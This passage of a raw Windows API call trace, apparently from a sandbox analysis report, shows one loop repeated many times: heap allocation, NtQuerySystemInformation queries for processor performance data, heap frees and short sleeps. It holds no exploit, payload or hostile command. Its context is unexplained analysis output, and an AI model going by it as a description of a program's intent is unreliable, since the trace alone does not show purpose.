SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0242.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0242.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0242.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0242.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0242.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.800] Sleep (dwMilliseconds=0x110) [0242.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0242.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0242.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0242.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0242.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0242.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0242.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0242.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0242.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.819] Sleep (dwMilliseconds=0x110) [0242.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0242.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0242.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0242.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0242.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0242.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0242.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0242.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0242.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.832] Sleep (dwMilliseconds=0x110) [0242.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0242.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0242.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0242.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0242.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0242.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0242.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.847] Sleep (dwMilliseconds=0x110) [0242.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0242.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0242.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0242.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0242.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0242.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0242.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0242.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0242.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.861] Sleep (dwMilliseconds=0x110) [0242.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0242.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0242.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0242.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0242.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0242.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0242.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0242.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0242.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.907] Sleep (dwMilliseconds=0x110) [0242.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0242.928] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0242.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0242.929] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0242.929] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0242.929] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.930] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0242.930] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0242.930] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.931] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0242.931] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.932] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.932] Sleep (dwMilliseconds=0x110) [0242.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0242.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0242.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0242.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0242.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0242.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0242.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0242.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0242.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.940] Sleep (dwMilliseconds=0x110) [0242.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0242.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0242.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0242.962] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.963] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0242.963] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.963] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.963] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.963] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0242.963] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.964] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0242.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.965] Sleep (dwMilliseconds=0x110) [0242.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0242.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0242.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0242.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0242.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0242.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0242.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0242.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0242.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.987] Sleep (dwMilliseconds=0x110) [0243.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0243.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0243.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0243.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0243.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0243.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0243.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.004] Sleep (dwMilliseconds=0x110) [0243.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0243.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0243.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0243.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0243.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0243.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0243.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0243.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0243.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.020] Sleep (dwMilliseconds=0x110) [0243.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0243.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0243.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0243.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0243.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0243.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0243.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0243.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0243.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.035] Sleep (dwMilliseconds=0x110) [0243.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0243.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0243.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0243.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0243.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0243.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0243.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0243.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0243.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.048] Sleep (dwMilliseconds=0x110) [0243.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 